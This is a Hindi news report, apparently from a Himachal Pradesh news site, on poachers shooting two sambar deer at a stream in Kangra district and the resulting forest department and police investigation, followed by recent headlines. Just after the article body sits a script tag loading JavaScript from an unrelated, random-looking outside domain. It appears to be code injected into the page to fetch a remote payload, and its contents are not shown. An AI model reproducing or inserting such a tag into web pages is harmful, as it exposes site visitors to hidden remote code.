Categories: हिमाचल

कांगड़ाः खरटी बनेर खड्ड में पानी पीने आए सांभर के झुंड पर शिकारियों ने बरसा दीं गोलियां

<p>जिला कांगड़ा में वन्यजीवों का धड़ल्ले से शिकार किया जा रहा है। रविवार रात को पंचायत नंदरूल के गांव खरटी बनेर खड्ड में पानी पीने आए सांभर के झुंड पर शिकारियों ने गोलियां बरसा दीं। एक सांभर और उसका बच्चा गोली का शिकार हो गया और वहीं ढेर हो गए। बताया जा रहा है शिकार की घटना रविवार देर रात्रि को घटित हुई जब सांभर का एक झुंड गांव खरटी के जंगलों में घूम रहा था। इस दौरान शिकारियों द्वारा झुंड पर गोली चलाना शुरू कर दिया और इस घटना में दो सांभर मारे गए।</p>

<p>घटना की जानकारी वन विभाग को मिली तो वन विभाग के&nbsp; कर्मचारी मौके पर पहुंचे और मृत दो सांभर को अपने कब्जे में लिया। घटना की सूचना वन विभाग के आला अधिकारियों को भी दी गई और वन अधिकारी आज सुबह मौके पर पहुंचे। वनरक्षक नंदरूल क्षेत्र के प्रभारी मनीष ने बताया कि शिकार की जानकारी जैसे उन्हें मिली वह मौके पर पहुंचे। रात के समय सांभर का झुंड बनेर खड्ड में पानी पीने के लिए आया था और शिकारी इसी ताक में बैठे थे और सांभर का झुंड आते ही शिकारियों ने गोली चलाना शुरू कर दिया, जिससे मौके पर 2 सांभर मारे गए। रात को ही बनेर खड्ड से दोनों मृत सांबर खरटी पहुंचाए गए, जहां से कांगड़ा वन विभाग कार्यालय लाया गया।</p>

<p>वन विभाग ने कांगड़ा पुलिस और अपने उच्च अधिकारियों को सूचित कर दिया है और मौके पर उनके अधिकारी पहुंच कर छानबीन कर रहे है। कांगड़ा के ही वेटरनरी अस्&zwj;पताल में इन दोनों सांबरों का पोस्टमार्टम होगा और उसके बाद इनका संस्कार कर दिया जाएगा। पंचायत नंदरुल के नवनिर्वाचित प्रधान संजीव कुमार ने बताया जंगल में शिकार हो रहा है और इसको लेकर उन्होंने प्रशासन को भी सूचित किया था, लेकिन कोई कार्रवाई नहीं हुई। उन्होंने कहा कि वन्य जीवों का शिकार करना दुखद है और शिकारियों के खिलाफ पुलिस को कड़ी कार्रवाई करनी चाहिए। वन विभाग की शिकायत पर कांगड़ा पुलिस ने मामला दर्ज कर जांच शुरू कर दी है। पुलिस ने वाइल्&zwj;ड लाइफ प्रोटेक्&zwj;शन एक्&zwj;ट के तहत कार्रवाई की जा रही है।</p>

<p><img src=”/media/gallery/images/image(2296).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

संजौली मस्जिद विवाद : चार अलग-अलग मामलों में 185 आरोपी बनाए,एफआईआर में भाजपा के राज्य कोषाध्यक्ष, विहिप के प्रांत मंत्री भी नामजद

  समाचार फर्स्‍ट नेटवर्क Shimla: संजौली मस्जिद में अवैध निर्माण के विरोध में प्रदर्शन करने…

3 hours ago

खुला नौकरियों का पिटारा: नगरोटा में ही 5000 युवाओं को रोजगार देने का लक्ष्य: बाली

 सिटी ग्रुप ने आयोजित किया रोजगार मेला, 300 का हुआ चयन 35 कंपनियों ने लिया…

7 hours ago

हमीरपुर में गणेश विसर्जन की धूम

  Hamirpur: गणेश महोत्सव के आयोजन के दौरान अंतिम दिन गणेश मूर्ति के विसर्जन से…

8 hours ago

उचित पोषण के लिए दैनिक आहार में विविधता जरूरी: सीडीपीओ

  Hamirpur:महिला एवं बाल विकास विभाग ने राष्ट्रीय पोषण माह के उपलक्ष्य पर सोमवार को…

8 hours ago

हमीरपुर में सदस्यता अभियान पकड़ेगा रफतार, कश्‍यप ने ली बैठक

  Hamirpur: भारतीय जनता पार्टी का देश भर में चला सदस्यता अभियान हिमाचल में भी…

8 hours ago

रंगस स्कूल के विद्यार्थियों को समझाए मौलिक कर्तव्य

  Hamirpur:जिला विधिक सेवाएं प्राधिकरण ने सोमवार को अंतर्राष्ट्रीय ओजोन परत संरक्षण दिवस के उपलक्ष्य…

8 hours ago